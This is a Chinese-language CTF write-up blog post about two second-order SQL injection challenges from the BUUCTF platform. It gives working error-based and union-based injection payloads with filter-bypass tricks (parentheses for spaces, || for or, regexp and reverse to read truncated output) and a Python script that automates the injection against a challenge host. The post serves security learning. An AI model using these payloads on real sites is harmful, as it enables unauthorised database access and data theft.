BUUCTF(40) - 掘金

持续创作，加速成长！这是我参与「掘金日新计划 · 6 月更文挑战」的第23天，点击查看活动详情

[RCTF2015]EasySQL

两个界面，注册和登录，猜测可能存在二次注入

测试发现，注册一个admin"用户并且在修改页面进行操作时会错报

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"admin"" and pwd='202cb962ac59075b964b07152d234b70'' at line 1

注入点就在这里

猜测SQL语句为

update 表 set password='xxx' where username='xx' and pwd='xx'

接下来就是错报注入，经过测试发现注册的username过滤了空格和and、or、/ *

用()来绕过空格

and、or可以用||和 &&绕过

测试语句：

admin"||extractvalue(1,concat(0x7e,user(),0x7e))#

进行了数据的返回，说明可行

admin"||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),0x7e))#
name,pwd,email,real_flag_1s_her

一系列发现flag在user表里

用mid、substr、left、right尝试截取后面未显示出来的字符不行，被过滤了

这里考到了利用正则来截取字符

    select * from test where name regexp '^r'
admin"||extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)=('users')%26%26(column_name)regexp('^r')),0x7e))#
real_flag_1s_here
admin"||extractvalue(1,concat(0x7e,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f')),0x7e))#

reserve()函数将字符串反转

admin"||extractvalue(1,concat(0x7e,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp('^f'))),0x7e))#

题目到这就结束了，网上查看时发现有大佬写了脚本，这里贴一下以后可能会用到

import requests
session = requests.session()
url = 'http://38316b97-1349-4dde-9c4c-8a40ed08d21e.node4.buuoj.cn:81/register.php'


#爆库
#name = 'test"||(updatexml(1,concat(0x3a,(select(group_concat(schema_name))from(information_schema.schemata))),1))#'


#爆表
#name = 'test"^updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema=database()))),1)#'


#爆列名(第一次获得的flag列名并不是完整的列名)
#name = 'test"^updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name="flag"))),1)#'


#regexp正则爆完整列名
#name = 'test"^updatexml(1,concat(0x3a,(select(group_concat(column_name))from(information_schema.columns)where(table_name="users")&&(column_name)regexp("^r"))),1)#'


#爆数据(因为updatexml报错只能显示20个字符，所以还要把另一半显示出来)
#name = 'username=mochu7"||(updatexml(1,concat(0x3a,(select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp("^f"))),1))#'


#逆序在输出一遍
name = 'test"^updatexml(1,concat(0x3a,reverse((select(group_concat(real_flag_1s_here))from(users)where(real_flag_1s_here)regexp("^f")))),1)#'


#}4af6e7d54142   -ed3a-0784-720f-a7
#flag{eb26f47a-f027-4870-a3de-24145d7e6fa4}


data1 = {
	'username': name,
	'password': '123',
	'email': '123'
}
req1 = session.post(url,data=data1)




url2 = 'http://38316b97-1349-4dde-9c4c-8a40ed08d21e.node4.buuoj.cn:81/login.php'
data2 = {
	'username': name,
	'password': '123'
}


req2 = session.post(url2,data2)




url3 = 'http://38316b97-1349-4dde-9c4c-8a40ed08d21e.node4.buuoj.cn:81/changepwd.php'
data = {
	'newpass': '1234',
	'oldpass': '123'
}
req3 = session.post(url3,data)
print(req3.text)


flag{c3b0de7a-8919-49ec-9311-ffe8462851fc}

拼接一下就是flag

October 2019 Twice SQL Injection

也是二次注入，也是很简单的页面，比上一个简单一些

XINO' union select database() #

注册点存在注入

XINO' union select database() #


XINO' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' #


XINO' union select group_concat(column_name) from information_schema.columns where table_name='flag'#


XINO' union select flag from flag #

直接走就可以